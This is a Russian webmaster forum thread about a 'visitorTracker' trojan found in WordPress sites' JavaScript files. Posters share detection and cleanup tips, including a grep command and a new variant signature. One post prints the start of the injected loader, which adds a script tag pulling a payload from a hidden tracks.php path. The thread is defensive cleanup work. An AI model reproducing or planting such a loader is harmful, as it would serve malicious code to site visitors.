Помощник
|
"Дыра" в Wordpress |
mmkulikov
|
Сообщение
#1
|
||
|
|
||
|
|||
Vreg |
29.9.2015, 13:58;
Ответить: Vreg
Сообщение
#2
|
|
Каким образом проверяли?
|
|
|
mmkulikov
|
Сообщение
#3
|
|
Каким образом проверяли? Для начала получил "письмо счастья" от гугла, а потом все сайты руками Находится легко, благо не шифруется Вот пример начала зараженного файла js Код /*visitorTracker*/ var visitortrackerin = setInterval(function(){ if(document.body != null && typeof document.body != "undefined"){ clearInterval(visitortrackerin); if(typeof window["globalvisitor"] == "undefined"){ window["globalvisitor"] = 1; var isIE = visitortrackerde(); var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc."; if(visitorTracker_isMob()){ var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://здесь_потер_урл_своего_сайта/wp-includes/SimplePie/Content/Type/main_configs/tracks.php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs); }else{ Удаляем все найденные куски (они все только в начале файла) между /*visitorTracker*/код_трояна/*visitorTracker*/ Ну и папку с файлом (может распологаться по разному и называться по разному) В данном примере это wp-includes/SimplePie/Content/Type/main_configs/tracks.php Где-то так-с -------------------- VPS от 5€ |
|
|
Вентилятор |
29.9.2015, 14:20;
Ответить: Вентилятор
Сообщение
#4
|
|
|
|
|
x64 |
29.9.2015, 16:08;
Ответить: x64
Сообщение
#5
|
|
Поискать файлы можно так: коннектимся по SSH и выполняем команду:
Код find /путь/к/сайтам/ -name '*.php' | xargs -n1 grep -rlF 'VisitorTracker' |
|
|
kagtus |
29.9.2015, 17:11;
Ответить: kagtus
Сообщение
#6
|
|
ТС, из какой фразы статьи вытекает, что
Цитата на сайтах под управлением WordPress (включая самую последнюю) ??? Сообщение отредактировал kagtus - 29.9.2015, 17:12 -------------------- |
|
|
siteSgun |
30.9.2015, 2:33;
Ответить: siteSgun
Сообщение
#7
|
|
Эпидемия новой заразы на сайтах под управлением WordPress (включая самую последнюю) Как раз самые последние версии, чаще всего, и подвержены подобным "налетам". Шанс найти уязвимость и широкое распространение не оставляет шансов остаться без внимания у хакеров. Есть же стабильные предыдущие релизы, зачем каждый раз торопиться с обновлениями?.. |
|
|
mmkulikov
|
Сообщение
#8
|
|
find /путь/к/сайтам/ -name '*.php' | xargs -n1 grep -rlF 'VisitorTracker' Сегодня обнаружил "клон" этой заразы с уже другой сигнатурой /*161557fbea2c302f309892cd115a35aa*/ Вот же га... P.S. Кстати - ошибочка ) Не *.php надо, а *.js Эта дрянь "живет" в js скриптах Сообщение отредактировал mmkulikov - 30.9.2015, 11:57 -------------------- VPS от 5€ |
|
|
x64 |
30.9.2015, 12:03;
Ответить: x64
Сообщение
#9
|
|
|
|
|
mmkulikov
|
Сообщение
#10
|
|
Да хоть по всем файлам, но это ж долго У меня "сидело" и в "безликих" tetqwqsad0ehSvo и т.п. (около 3000 файлов) И 'VisitorTracker' уже не панацея Благо "стиль" заражения пока остался. Ключевое сло здесь наверное "пока" -------------------- VPS от 5€ |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Продам базу сайтов Wordpress в 16 миллионов доменов! Свежая сборка. | 19 | Boymaster | 11342 | 20.4.2024, 0:01 автор: Boymaster |
|
Хостинг "Hostland" - качественный хостинг по разумным ценам и со своей Панелью Управления | 0 | artmeteor | 530 | 18.4.2024, 22:46 автор: artmeteor |
|
⭐⭐⭐ Google Voice | Gmail - OLD аккаунты "SMS и звонки" ⭐⭐⭐ | 15 | Chekon | 4467 | 18.4.2024, 12:00 автор: Chekon |
|
✅ sms.chekons.com - ⭐ Сервис для получения SMS на реальные номера USA "Non-VoIP, безлим SMS, API" ⭐ Сервис для получения SMS на реальные номера USA |
13 | Chekon | 4095 | 18.4.2024, 11:48 автор: Chekon |
|
Требуется помощь по сайту на "ВордПресс" Закрылся доступ в панель администратора |
15 | Tia2 | 2370 | 17.4.2024, 0:54 автор: diviner99 |
Текстовая версия | Сейчас: 24.4.2024, 1:17 |